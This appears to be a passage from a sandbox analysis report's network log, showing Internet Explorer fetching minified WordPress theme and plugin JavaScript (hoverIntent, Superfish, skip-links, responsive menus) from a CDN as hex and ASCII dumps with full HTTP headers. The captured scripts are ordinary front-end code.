                                                                                              2021-12-13 23:57:32 UTC8673INData Raw: 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 34 3d 3d 3d 0d 0a 65 2e 72 65 61 64 79 53 74 61 74 65 26 26 32 30 30 3c 3d 65 2e 73 74 61 74 75 73 26 26 33 30 30 3e 65 2e 73 74 61 74 75 73 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 67 26 26 67 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 65 2e 72 65 73 70 6f 6e 73 65 29 7d 3b 65 2e 73 65 6e 64 28 22 50 4f 53 54 22 3d 3d 62 3f 61 3a 6e 75 6c 6c 29 7d 3b 72 65 74 75 72 6e 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 61 2c 67 29 7b 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f 61 3a 6d 3b 66 28 22 47 45 54 22 2c 62 2c 63 2c 61 2c 67 29 7d 2c 70 6f 73 74 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 61 2c 67 29 7b 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74
                                                                                              Data Ascii: ange=function(){4===e.readyState&&200<=e.status&&300>e.status&&"function"===typeof g&&g.call(void 0,e.response)};e.send("POST"==b?a:null)};return{get:function(b,c,a,g){a="function"===typeof a?a:m;f("GET",b,c,a,g)},post:function(b,c,a,g){a="function"===t
                                                                                              2021-12-13 23:57:32 UTC8675INData Raw: 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6d 28 62 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 69 64 67 65 74 2d 69 64 22 29 2c 61 3d 22 47 45 54 22 2c 67 3d 22 22 2c 6b 3d 7b 7d 2c 65 3d 22 22 3b 69 66 28 63 29 67 3d 77 70 70 5f 70 61 72 61 6d 73 2e 61 6a 61 78 5f 75 72 6c 2b 22 2f 77 69 64 67 65 74 2f 22 2b 63 2e 73 70 6c 69 74 28 22 2d 22 29 5b 31 5d 2c 65 3d 22 69 73 5f 73 69 6e 67 6c 65 3d 22 2b 77 70 70 5f 70 61 72 61 6d 73 2e 49 44 2b 28 77 70 70 5f 70 61 72 61 6d 73 2e 6c 61 6e 67 3f 22 26 6c 61 6e 67 3d 22 2b 77 70 70 5f 70 61 72 61 6d 73 2e 6c 61 6e 67 3a 22 22 29 3b 65 6c 73 65 20 69 66 28
                                                                                              Data Ascii: entListener("DOMContentLoaded",function(){function m(b){var c=b.getAttribute("data-widget-id"),a="GET",g="",k={},e="";if(c)g=wpp_params.ajax_url+"/widget/"+c.split("-")[1],e="is_single="+wpp_params.ID+(wpp_params.lang?"&lang="+wpp_params.lang:"");else if(
                                                                                              2021-12-13 23:57:32 UTC8676INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              21192.168.2.349782104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8676OUTGET /wp/c/5.8.2/wp-includes/js/hoverIntent.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8677INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a789df43b8-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"3aa297f91a36424548c3cce48beb860c6012cc44fb30d0973f168713c800ffd4"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-sjc10066-SJC, cache-fra19182-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8678INData Raw: 35 63 38 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 6a 51 75 65 72 79 26 26 21 6a 51 75 65 72 79 2e 66 6e 2e 68 6f 76 65 72 49 6e 74 65 6e 74 26 26 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 69 29
                                                                                              Data Ascii: 5c8/*! This file is auto-generated */!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=e(require("jquery")):jQuery&&!jQuery.fn.hoverIntent&&e(jQuery)}(function(i)
                                                                                              2021-12-13 23:57:32 UTC8679INData Raw: 65 2e 70 61 67 65 59 3d 72 2c 64 65 6c 65 74 65 20 6e 2e 70 58 2c 64 65 6c 65 74 65 20 6e 2e 70 59 2c 6f 2e 6f 76 65 72 2e 61 70 70 6c 79 28 74 5b 30 5d 2c 5b 65 5d 29 3b 6e 2e 70 58 3d 75 2c 6e 2e 70 59 3d 72 2c 6e 2e 74 69 6d 65 6f 75 74 49 64 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 70 28 65 2c 74 2c 6e 2c 6f 29 7d 2c 6f 2e 69 6e 74 65 72 76 61 6c 29 7d 3b 69 2e 66 6e 2e 68 6f 76 65 72 49 6e 74 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 3d 61 2b 2b 2c 73 3d 69 2e 65 78 74 65 6e 64 28 7b 7d 2c 76 29 3b 69 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 3f 28 73 3d 69 2e 65 78 74 65 6e 64 28 73 2c 65 29 2c 69 2e 69 73 46 75 6e 63 74 69 6f 6e 28 73 2e 6f 75 74 29 7c 7c 28 73 2e 6f 75 74 3d 73
                                                                                              Data Ascii: e.pageY=r,delete n.pX,delete n.pY,o.over.apply(t[0],[e]);n.pX=u,n.pY=r,n.timeoutId=setTimeout(function(){p(e,t,n,o)},o.interval)};i.fn.hoverIntent=function(e,t,n){var o=a++,s=i.extend({},v);i.isPlainObject(e)?(s=i.extend(s,e),i.isFunction(s.out)||(s.out=s
                                                                                              2021-12-13 23:57:32 UTC8680INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              22192.168.2.349783104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8676OUTGET /js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8680INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a7bb9b434b-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"b9afc47b634e7bd61a2b851372ece2dba26dd717f87cf5dde6f3bcc107186d60"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21972-LGA, cache-fra19155-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8681INData Raw: 31 31 39 33 0d 0a 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 53 75 70 65 72 66 69 73 68 20 4d 65 6e 75 20 50 6c 75 67 69 6e 20 2d 20 76 31 2e 37 2e 31 30 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 38 20 4a 6f 65 6c 20 42 69 72 63 68 0a 20 2a 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 09 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 0a 20 2a 09 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6e 75 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 67 70 6c 2e 68 74 6d 6c 0a 20 2a 2f 0a 0a 3b 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65
                                                                                              Data Ascii: 1193/* * jQuery Superfish Menu Plugin - v1.7.10 * Copyright (c) 2018 Joel Birch * * Dual licensed under the MIT and GPL licenses: *http://www.opensource.org/licenses/mit-license.php *http://www.gnu.org/licenses/gpl.html */;!function(a,b){"use
                                                                                              2021-12-13 23:57:32 UTC8682INData Raw: 22 2c 22 70 6f 69 6e 74 65 72 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 61 2e 6e 6f 6f 70 29 2c 62 7d 28 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 3b 72 65 74 75 72 6e 22 62 65 68 61 76 69 6f 72 22 69 6e 20 61 26 26 22 66 69 6c 6c 22 69 6e 20 61 26 26 2f 69 65 6d 6f 62 69 6c 65 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 62 2e 50 6f 69 6e 74 65 72 45 76 65 6e 74 7d 28 29 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 76 61 72 20 65 2c 66 3d 63 2e 6d 65 6e 75 43 6c 61 73 73 3b 62 2e 63 73 73 41 72 72 6f 77 73 26 26 28 66 2b
                                                                                              Data Ascii: ","pointer").on("click",a.noop),b}(),e=function(){var a=document.documentElement.style;return"behavior"in a&&"fill"in a&&/iemobile/i.test(navigator.userAgent)}(),f=function(){return!!b.PointerEvent}(),g=function(a,b,d){var e,f=c.menuClass;b.cssArrows&&(f+
                                                                                              2021-12-13 23:57:32 UTC8683INData Raw: 65 54 6f 75 63 68 2e 63 61 6c 6c 28 65 29 3d 3d 3d 21 31 3f 74 68 69 73 3a 76 6f 69 64 28 65 2e 6c 65 6e 67 74 68 3e 30 26 26 65 2e 69 73 28 22 3a 68 69 64 64 65 6e 22 29 26 26 28 63 2e 6f 6e 65 28 22 63 6c 69 63 6b 2e 73 75 70 65 72 66 69 73 68 22 2c 21 31 29 2c 22 4d 53 50 6f 69 6e 74 65 72 44 6f 77 6e 22 3d 3d 3d 62 2e 74 79 70 65 7c 7c 22 70 6f 69 6e 74 65 72 64 6f 77 6e 22 3d 3d 3d 62 2e 74 79 70 65 3f 63 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 3a 61 2e 70 72 6f 78 79 28 6d 2c 63 2e 70 61 72 65 6e 74 28 22 6c 69 22 29 29 28 29 29 29 7d 2c 71 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 67 3d 22 6c 69 3a 68 61 73 28 22 2b 63 2e 70 6f 70 55 70 53 65 6c 65 63 74 6f 72 2b 22 29 22 3b 61 2e 66 6e 2e 68 6f 76 65 72 49 6e 74 65 6e 74
                                                                                              Data Ascii: eTouch.call(e)===!1?this:void(e.length>0&&e.is(":hidden")&&(c.one("click.superfish",!1),"MSPointerDown"===b.type||"pointerdown"===b.type?c.trigger("focus"):a.proxy(m,c.parent("li"))()))},q=function(b,c){var g="li:has("+c.popUpSelector+")";a.fn.hoverIntent
                                                                                              2021-12-13 23:57:32 UTC8684INData Raw: 22 2e 73 75 70 65 72 66 69 73 68 22 29 2e 6f 66 66 28 22 2e 68 6f 76 65 72 49 6e 74 65 6e 74 22 29 2c 62 2e 63 68 69 6c 64 72 65 6e 28 65 2e 70 6f 70 55 70 53 65 6c 65 63 74 6f 72 29 2e 61 74 74 72 28 22 73 74 79 6c 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 29 72 65 74 75 72 6e 20 62 2e 72 65 70 6c 61 63 65 28 2f 64 69 73 70 6c 61 79 5b 5e 3b 5d 2b 3b 3f 2f 67 2c 22 22 29 7d 29 2c 65 2e 24 70 61 74 68 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 65 2e 68 6f 76 65 72 43 6c 61 73 73 2b 22 20 22 2b 63 2e 62 63 43 6c 61 73 73 29 2e 61 64 64 43 6c 61 73 73 28 65 2e 70 61 74 68 43 6c 61 73 73 29 2c 64 2e 66 69 6e 64 28 22 2e 22 2b 65 2e 68 6f 76 65 72 43 6c 61 73 73 29 2e 72 65 6d 6f 76
                                                                                              Data Ascii: ".superfish").off(".hoverIntent"),b.children(e.popUpSelector).attr("style",function(a,b){if("undefined"!=typeof b)return b.replace(/display[^;]+;?/g,"")}),e.$path.removeClass(e.hoverClass+" "+c.bcClass).addClass(e.pathClass),d.find("."+e.hoverClass).remov
                                                                                              2021-12-13 23:57:32 UTC8686INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              23192.168.2.349784104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8676OUTGET /js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8687INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a7ba451f25-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"567262b2d597b1ce55f2ebbeb3d1d808e9c9bfed441e8d6be1f5f094ebb2a86a"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-BO-LB-Server: LA-160
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21975-LGA, cache-fra19181-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8688INData Raw: 38 34 0d 0a 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 24 28 22 2e 6a 73 2d 73 75 70 65 72 66 69 73 68 22 29 2e 73 75 70 65 72 66 69 73 68 28 7b 64 65 6c 61 79 3a 31 30 30 2c 61 6e 69 6d 61 74 69 6f 6e 3a 7b 6f 70 61 63 69 74 79 3a 22 73 68 6f 77 22 2c 68 65 69 67 68 74 3a 22 73 68 6f 77 22 7d 2c 64 72 6f 70 53 68 61 64 6f 77 73 3a 21 31 7d 29 7d 29 3b 0d 0a
                                                                                              Data Ascii: 84jQuery(function($){"use strict";$(".js-superfish").superfish({delay:100,animation:{opacity:"show",height:"show"},dropShadows:!1})});
                                                                                              2021-12-13 23:57:32 UTC8688INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              24192.168.2.349785104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8677OUTGET /js/websetnet.net/wp-content/themes/genesis/lib/js/skip-links.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8686INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a7be51c27c-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"bbf1223e71dd1ed50deae3c76f14aac567346d425c57928ec2d74ad1d0515849"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-BO-LB-Server: LA-161
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21952-LGA, cache-fra19172-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8687INData Raw: 31 38 32 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 61 5f 73 6b 69 70 6c 69 6e 6b 73 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 72 61 67 6d 65 6e 74 49 44 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 69 66 28 66 72 61 67 6d 65 6e 74 49 44 29 7b 76 61 72 20 65 6c 65 6d 65 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 72 61 67 6d 65 6e 74 49 44 29 3b 65 6c 65 6d 65 6e 74 26 26 28 21 31 3d 3d 3d 2f 5e 28 3f 3a 61 7c 73 65 6c 65 63 74 7c 69 6e 70 75 74 7c 62 75 74 74 6f 6e 7c 74 65 78 74 61 72 65 61 29 24 2f 69 2e 74 65 73 74 28 65 6c 65 6d 65 6e 74 2e 74 61 67 4e 61 6d 65 29 26 26 28 65 6c 65 6d 65 6e 74 2e 74 61 62 49 6e 64 65 78 3d 2d 31 29 2c 65 6c 65 6d 65 6e 74 2e
                                                                                              Data Ascii: 182function ga_skiplinks(){"use strict";var fragmentID=location.hash.substring(1);if(fragmentID){var element=document.getElementById(fragmentID);element&&(!1===/^(?:a|select|input|button|textarea)$/i.test(element.tagName)&&(element.tabIndex=-1),element.
                                                                                              2021-12-13 23:57:32 UTC8687INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              25192.168.2.349786104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8680OUTGET /js/websetnet.net/wp-content/themes/magazine-pro/js/responsive-menus.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8688INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a7d80168f5-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"0005c17639cab2a665abf36479353ca237906796f8c812754d0d3e91d0f8864f"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21958-LGA, cache-fra19173-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8689INData Raw: 65 36 34 0d 0a 2f 2a 0a 20 47 50 4c 2d 32 2e 30 2d 6f 72 2d 6c 61 74 65 72 0a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 70 2c 62 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 76 61 72 20 61 3d 62 28 27 62 75 74 74 6f 6e 5b 69 64 5e 5c 78 33 64 22 67 65 6e 65 73 69 73 2d 6d 6f 62 69 6c 65 2d 22 5d 27 29 2e 61 74 74 72 28 22 69 64 22 29 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 61 29 7b 22 6e 6f 6e 65 22 3d 3d 3d 6c 28 61 29 26 26 28 62 28 22 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 2c 20 2e 67 65 6e 65 73 69 73 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 65 6e 75 20 2e 73 75 62 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 61 74 65 64 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65
                                                                                              Data Ascii: e64/* GPL-2.0-or-later*/(function(p,b,y){function q(){var a=b('button[id^\x3d"genesis-mobile-"]').attr("id");if("undefined"!==typeof a){"none"===l(a)&&(b(".menu-toggle, .genesis-responsive-menu .sub-menu-toggle").removeClass("activated").attr("aria-e
                                                                                              2021-12-13 23:57:32 UTC8690INData Raw: 73 68 6f 77 22 2c 68 65 69 67 68 74 3a 22 73 68 6f 77 22 7d 2c 0a 64 72 6f 70 53 68 61 64 6f 77 73 3a 21 31 2c 73 70 65 65 64 3a 22 66 61 73 74 22 7d 29 2c 63 2e 73 75 70 65 72 66 69 73 68 28 64 29 29 3b 72 28 61 29 3b 74 28 61 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 76 61 72 20 61 3d 62 28 74 68 69 73 29 2c 63 3d 61 2e 6e 65 78 74 28 22 6e 61 76 22 29 3b 61 2e 61 74 74 72 28 22 69 64 22 2c 22 67 65 6e 65 73 69 73 2d 6d 6f 62 69 6c 65 2d 22 2b 62 28 63 29 2e 61 74 74 72 28 22 63 6c 61 73 73 22 29 2e 6d 61 74 63 68 28 2f 6e 61 76 2d 5c 77 2a 5c 62 2f 29 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 61 29 7b 69 66 28 6e 75 6c 6c 21 3d 66 29 7b 76 61 72 20 63 3d 66 5b 30 5d 2c 64 3d 62 28 66 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69
                                                                                              Data Ascii: show",height:"show"},dropShadows:!1,speed:"fast"}),c.superfish(d));r(a);t(a)}}function u(){var a=b(this),c=a.next("nav");a.attr("id","genesis-mobile-"+b(c).attr("class").match(/nav-\w*\b/))}function t(a){if(null!=f){var c=f[0],d=b(f).filter(function(a){i
                                                                                              2021-12-13 23:57:32 UTC8691INData Raw: 6c 28 61 29 7b 61 3d 70 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 61 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 64 69 73 70 6c 61 79 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 2c 62 29 7b 61 2e 61 74 74 72 28 62 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 22 66 61 6c 73 65 22 3d 3d 3d 62 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 72 65 74 75 72 6e 20 62 2e 6d 61 70 28 61 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 7d 29 2e 6a 6f 69 6e 28 22 2c 22 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 61 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 66 26 26 62 2e 65 61 63 68 28 66 2c 66
                                                                                              Data Ascii: l(a){a=p.getElementById(a);return window.getComputedStyle(a).getPropertyValue("display")}function m(a,b){a.attr(b,function(a,b){return"false"===b})}function k(a){return b.map(a,function(a,b){return a}).join(",")}function n(){var a=[];null!==f&&b.each(f,f
